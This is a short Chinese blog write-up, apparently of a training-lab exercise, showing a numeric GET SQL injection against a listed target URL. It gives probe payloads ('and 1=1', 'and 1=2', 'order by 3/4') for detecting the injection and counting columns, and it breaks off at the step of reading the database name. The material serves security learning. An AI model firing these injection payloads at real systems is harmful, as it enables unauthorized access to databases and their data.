声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
本文首发于 涂寐’s Blogs:安鸾SQL系列之数字字符串 | 涂寐's Blogs
SQL数字型GET注入01
漏洞URL:http://47.103.94.191:8001/bug/sql_injection/sql_num.php
提示:flag在数据库里
# 测类型--数字型
http://47.103.94.191:8001/bug/sql_injection/sql_num.php?id=1 and 1=1&submit=submit
http://47.103.94.191:8001/bug/sql_injection/sql_num.php?id=1 and 1=2&submit=submit
# 测字段--3
http://47.103.94.191:8001/bug/sql_injection/sql_num.php?id=1 order by 3&submit=submit
http://47.103.94.191:8001/bug/sql_injection/sql_num.php?id=1 order by 4&submit=submit
# 获取当前所在数据库--dwvs